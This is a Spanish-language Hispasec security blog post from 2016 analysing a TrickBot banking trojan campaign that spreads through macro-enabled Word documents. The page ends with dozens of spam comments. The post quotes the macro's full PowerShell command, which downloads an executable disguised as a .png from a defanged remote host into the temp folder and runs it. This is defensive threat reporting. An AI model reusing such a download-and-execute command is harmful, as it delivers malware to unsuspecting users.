martes, 29 de noviembre de 2016

Continúan las andanzas de Trickbot

Hasta ahora encontrábamos el troyano bancario TrickBot como un binario aislado, pero abandona su comportamiento para seguir un modus operandi más habitual de éste tipo de amenazas. Además, cabe destacar que a pesar de comenzar en Australia y avanzar cruzar el charco hasta Europa, esta vez ha llegado a Canadá.

Captura del documento de Word que solicita habilitar el contenido


Esta vez, encontramos un documento de Word el cual nos pide que habilitemos la edición y el contenido, de esta manera permitiendo que se ejecuten las macros incluidas dentro del documento de Word.

Esta macro, lanza a través de Powershell la descarga de un archivo remoto .png, que a pesar de su extensión no es una imagen...

PowerShell (New-Object System.Net.WebClient).DownloadFile('hxxp://wingsbiotech.com/kufma/sdogsodngsdlk.png','C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe');Start-process 'C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe';

Tras la descarga de la falsa iagen ".png", se almacena en %temp% para posteriormente ser ejecutado con una llamada a start-process


Una vez lograda la infección, comienza a conectarse a servidores remotos para descargar la configuración necesaria para su funcionamiento (tal y como vimos en la anterior una-al-día).

Esta vez, además de a los clientes de las entidades ya mencionadas se suman a la lista de afectados Santander UK y a BMO, conocido como "Bank of Montreal" (Canadá).

Recuerda que si recibes un documento por parte de un desconocido no debes abrirlo. A esto debemos añadir, que no se deben habilitar posibles ejecuciones de contenido en documentos de Office cuando el destinatario de este es desconocido, para evitar este tipo de amenazas.

Más información:

una-al-dia (07/11/2016) El troyano bancario TrickBot azota a Europa
http://unaaldia.hispasec.com/2016/11/el-troyano-bancario-trickbot-azota.html
  


Fernando Díaz
fdiaz@hispasec.com

Publicado por en
Etiquetas: ,

55 comentarios:

  1. Unknown22 de febrero de 2017, 19:16

    Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  2. Sheilla22 de febrero de 2017, 19:18

    Good Article..

    ResponderEliminar
  3. blood donors needed4 de mayo de 2017, 8:24

    Great article.

    ResponderEliminar
  4. Pulau Seribu11 de noviembre de 2017, 11:57

    I love your blog

    ResponderEliminar
  5. Tour Belitung Murah28 de noviembre de 2017, 18:17

    Amazing article

    ResponderEliminar
  6. Hotel Bangka Belitung29 de noviembre de 2017, 23:33

    i really like your blog

    ResponderEliminar
  7. Batam Singapore23 de diciembre de 2017, 11:24

    I Love it

    ResponderEliminar
  8. Paket Wisata Malaysia23 de diciembre de 2017, 14:04

    Amazing Blog

    ResponderEliminar
  9. Sewa Quicksilver27 de diciembre de 2017, 11:54

    Nice, i love your blog

    ResponderEliminar
  10. Paket Tour Belitung27 de diciembre de 2017, 21:56

    i like your article

    ResponderEliminar
  11. Paket Belitung28 de diciembre de 2017, 8:47

    woow amazing, i like yout article

    ResponderEliminar
  12. Belitung 4 Hari28 de diciembre de 2017, 20:22

    keren banget artikelnya

    ResponderEliminar
  13. One day tour pulau komodo3 de enero de 2018, 23:34

    Mantap bro

    ResponderEliminar
  14. Pulau Komodo 2 Day4 de enero de 2018, 7:39

    Nice info

    ResponderEliminar
  15. Pulau Komodo4 de enero de 2018, 11:24

    Amazing

    ResponderEliminar
  16. Tour Bangkok5 de enero de 2018, 1:34

    Nice blog, thak you for sharing

    ResponderEliminar
  17. Wisata Belitung Murah6 de enero de 2018, 21:38

    I love it

    ResponderEliminar
  18. Paket Singapore 2D1N9 de enero de 2018, 14:43

    mantap

    ResponderEliminar
  19. Pulau Sepa Resort12 de enero de 2018, 9:46

    Cool

    ResponderEliminar
  20. Paket Wisata Thailand13 de enero de 2018, 22:40

    Mantap articlenya

    http://maritimtours.com/tanjung-lesung/

    ResponderEliminar
  21. Pulau Macan14 de enero de 2018, 10:17

    Nice article

    ResponderEliminar
  22. Paket Pulau Bidadari Resort14 de enero de 2018, 21:01

    Amazing

    ResponderEliminar
  23. Outbound Bogor23 de enero de 2018, 9:18

    Mantap

    ResponderEliminar
  24. Outbound Pancawati23 de enero de 2018, 19:29

    keren banget

    ResponderEliminar
  25. Paket Outbound puncak24 de enero de 2018, 18:26

    cool

    ResponderEliminar
  26. Paket Outbound Bandung12 de febrero de 2018, 12:19

    Keren...

    ResponderEliminar
  27. Sewa Bus Pariwisata13 de febrero de 2018, 9:32

    Mantap blognya

    ResponderEliminar
  28. Pulau Ayer15 de febrero de 2018, 5:41

    Makasih udah sharing

    ResponderEliminar
  29. Pulau Pari15 de febrero de 2018, 18:05

    artikel yang menarik

    ResponderEliminar
  30. Outbound Bogor18 de enero de 2019, 13:15

    it's good to use video, so it's easy to understand

    ResponderEliminar
  31. Outbound Bogor19 de enero de 2019, 11:22

    nice tutorial,

    ResponderEliminar
  32. outbound di bogor19 de enero de 2019, 11:26

    Thank's for your sharing

    ResponderEliminar
  33. paket outbound bogor19 de enero de 2019, 11:27

    nice article, nice tutorial, thank's for your sharing article

    ResponderEliminar
  34. outbound bogor19 de enero de 2019, 11:29

    nice tutorial

    ResponderEliminar
  35. Elite7 de julio de 2019, 16:56

    it's good to use video, so it's easy to understand

    ResponderEliminar
  36. andri yanto23 de julio de 2019, 6:08

    nice post very interest

    ResponderEliminar
  37. Paket Wisata Murah7 de enero de 2020, 3:51

    Nice post, thanks for sharing

    ResponderEliminar
  38. Korea tour 5 hari murah5 de febrero de 2020, 3:38

    thank's for your sharing article

    ResponderEliminar
  39. sewa bus pariwisata medan12 de abril de 2020, 5:10

    Many thanks for sharing

    ResponderEliminar
  40. paket wisata danau toba dari silangit26 de abril de 2020, 8:45

    Thank you so much for sharing

    ResponderEliminar
  41. paket wisata sabang4 de mayo de 2020, 6:54

    Terima kasih atas informasi yang menarik ini.

    ResponderEliminar
  42. paket wisata berastagi6 de mayo de 2020, 9:53

    Many thanks for sharing

    ResponderEliminar
  43. Igoal13 de junio de 2022, 8:25

    Thanks for sharing such a great article with us Thanks a lot.
    ลิงค์รับทรัพย์

    ResponderEliminar
  44. casinositewiki8 de diciembre de 2022, 2:46

    Positive site, Read articles on this website, I really like your style. Thanks 카지노사이트

    ResponderEliminar
  45. oncasinosite8 de diciembre de 2022, 2:47

    Continue sharing such an excellent post. Glad that I found this, Thankyou.온라인카지노

    ResponderEliminar
  46. casinositetop8 de diciembre de 2022, 2:49

    Continue for sharing such a excellent post here. Keep on sharing, Cheers 카지노사이트탑

    ResponderEliminar
  47. casinositeking8 de diciembre de 2022, 2:50

    This is a tremendous post Keep up the great work. Sharing is nice keep it up 카지노사이트킹

    ResponderEliminar
  48. Tour1 de junio de 2023, 3:29

    https://tourwisatatripmancing.blogspot.com/2023/05/tapanuli-utara-sumatera-utara.html?m=1

    ResponderEliminar
  49. Travel1 de junio de 2023, 3:30

    https://switour.wordpress.com/2023/05/31/bukit-indah-simarjarunjung-danau-toba/

    ResponderEliminar
  50. casinositeone.JDS5 de agosto de 2023, 14:50

    This blog provides valuable information to us, keep it up.

    ResponderEliminar
  51. casinosite777top.JDS5 de agosto de 2023, 14:50

    Great article. Couldn’t be write much better! Keep it up!

    ResponderEliminar
  52. casinositeguidecom.JDS5 de agosto de 2023, 14:50

    Either way keep up the excellent quality writing.

    ResponderEliminar
  53. safetotositepro.JDS5 de agosto de 2023, 14:51

    Your blogs are truly awesome. Keep it up.

    ResponderEliminar
  54. Bandung10 de octubre de 2023, 14:14

    Muy bien

    ResponderEliminar
  55. Bandung Indo10 de octubre de 2023, 14:16

    Publicar comento

    ResponderEliminar

Suscribirse a: Enviar comentarios (Atom)
Hispasec Sistemas | Copyright ©1998-2017